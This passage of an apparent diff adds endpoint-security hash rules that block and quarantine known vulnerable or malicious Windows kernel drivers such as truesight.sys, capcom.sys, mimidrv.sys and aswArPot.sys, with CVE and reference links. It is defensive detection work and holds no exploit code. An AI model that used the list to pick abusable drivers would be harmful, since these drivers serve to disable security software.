"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a768158c06ff8edfb78ec3b1e4fd94f6192db3a8e99de1bae49fe20b3b1b8cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ed3b7d1-aac0-5e42-a033-cd34edcedf95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974212Z", + "creation_date": "2026-03-23T11:45:29.974214Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974219Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d580349730ace5170e7c33850bdcb37cbf16b70d0d1adc2568fdd223c2a55a77", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ed9927e-4337-5ce4-be7d-2e66fa3dbe3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820353Z", + "creation_date": "2026-03-23T11:45:31.820356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820365Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ca246561628f2a9af36c683656b7d35155019d0c852dd4d8ef0dab3b2e8fd8d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7edeec82-8157-58db-80e0-fbf233e75a5b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464681Z", + "creation_date": "2026-03-23T11:45:30.464684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ef0d9b6-d7d4-55b2-a4ff-2665ab2f39ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622105Z", + "creation_date": "2026-03-23T11:45:29.622107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004", + "comment": "CapCom vulnerable driver (aka capcom.sys and smep_capcom.sys) [https://github.com/tandasat/ExploitCapcom] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f062100-a1dc-5e01-8507-4857f7254c7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144726Z", + "creation_date": "2026-03-23T11:45:32.144728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144734Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d35bc51acafab893698e6064d286541918a789ac7c06a6442bf4351dde842777", + "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f164674-0e50-5379-91d5-367da8094c5f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146038Z", + "creation_date": "2026-03-23T11:45:31.146040Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146046Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "883cef0ccaa689226bd64f18797b991757985c0963f80924bc9fbe3f93c03ef6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f21c238-96bc-5205-b518-93adc94f5e7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818666Z", + "creation_date": "2026-03-23T11:45:30.818668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53e15b21cc69a554d4d61ffe531be90364ed7b1bb64fc302d65eaa642c9fa60a", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f4390e7-622a-5d04-8c48-b90bedeeef4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497808Z", + "creation_date": "2026-03-23T11:45:31.497811Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497819Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b9b61e2e31eb8a8b9d5fc240489268fd4c77a70acbe000a79ec85445825a5ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f440e0e-8cb2-5583-b1ef-8ff72f2be431", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606025Z", + "creation_date": "2026-03-23T11:45:29.606027Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606033Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30abc0cc700fdebc74e62d574addc08f6227f9c7177d9eaa8cbc37d5c017c9bb", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f494827-ebe7-5b84-9cf1-0179e8eb719c", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474263Z", + "creation_date": "2026-03-23T11:45:31.474267Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474275Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9111e37a8b6b1ac41c4c909660301743cb1edf817555cce6c896a59ffe2025ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f553e4d-ecb2-57aa-98df-5fd95309f1db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617592Z", + "creation_date": "2026-03-23T11:45:29.617594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617600Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dca2ad045a9af1cdfc26d82fa7c581448aee098439fa21eee23d4c468a08560", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f5d25b4-e381-5bdf-9af9-d88b207e31c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479953Z", + "creation_date": "2026-03-23T11:45:30.479956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0285024823009ff4865ba119ebdd3712aa40406d33a45d9f93ef51525d20aa34", + "comment": "Vulnerable AMD uProf Kernel Driver (aka AMDCpuProfiler.sys) [CVE-2023-20562] [https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f61805c-7dba-52bb-aa24-9c4285520e74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", 
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819054Z", + "creation_date": "2026-03-23T11:45:30.819056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7036cd12dc9e3550239310fd8ff4f14e4266bbd0de3aba7b087068a253b506b", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f786451-924c-51e6-9e42-39b847fdfc3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453223Z", + "creation_date": "2026-03-23T11:45:30.453227Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453237Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c859b3d11d2ff0049b644a19f3a316a8ca1a4995aa9c39991a7bde8d4f426a4", + "comment": "Vulnerable Kernel Driver 
(aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f8c58aa-4971-55f8-add3-a1bc39565f11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828759Z", + "creation_date": "2026-03-23T11:45:31.828761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8aeaca6eadb98b98a453403b2e2051e1392da2b59b69ed0444661cd0db7fb3ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7f8ee504-40a9-59cb-872b-5b43b20f5bdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970054Z", + 
"creation_date": "2026-03-23T11:45:29.970056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d92b2f58c8fca3d3634b0c20578edd5004df571b29790690c97255e6096442c6", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7fa374c9-6e50-528d-b118-8040b020f22c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830240Z", + "creation_date": "2026-03-23T11:45:30.830242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc246ddc41cfa6896e1a9a81bc1927ed04ab2a77ac45fadc50fa332cedfd26df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"7fad973a-0613-5512-9027-d42f16cb4155", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828790Z", + "creation_date": "2026-03-23T11:45:30.828792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb89285f84fb13f7a5776abe89fe53303ee909d1b42b3bd7b89eb6b7429f429b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7fd9d383-48e9-5135-904e-7db00eb28243", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824512Z", + "creation_date": "2026-03-23T11:45:30.824515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.824522Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44e47c0a575abda6ced0dfcf4061eac2d01b229bd04bce7c760466d638c7b5d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7fe759aa-0c6e-522f-8f57-c460d3716321", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830383Z", + "creation_date": "2026-03-23T11:45:31.830386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830394Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b368de498601571722e619cf2fd65007c24351120687e1b887086db2482e0021", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ff1d88f-c986-5d33-a3e3-d9efca2affa8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498495Z", + "creation_date": "2026-03-23T11:45:31.498498Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3b620b41cd43c1feeadb5cdd8e9668b8b68c6bcbdfde5c5d7ad10baa05349e5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7ffd1aa0-839a-581e-a7c5-6ffc7089c546", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618859Z", + "creation_date": "2026-03-23T11:45:29.618861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae7d7d8a5bc48f2fb1dc81806a5eed52c3efc487cfdc8737d3ea3970dca7ce27", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80000f78-d503-5a0d-a3c9-530804b7ce0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975752Z", + "creation_date": "2026-03-23T11:45:29.975754Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6aa427e7230a2b077bfecade35ffff67b2f15c051cf92fd207a3412c747f83c3", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8000d607-a865-5207-83a1-a7a95cf66aeb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473796Z", + "creation_date": "2026-03-23T11:45:31.473800Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0d7e6e23fc631ed0c11093706346317f4f595791e47a8181a0ef633e5756faa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "800cf905-22be-544b-b07c-87fb3574f920", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 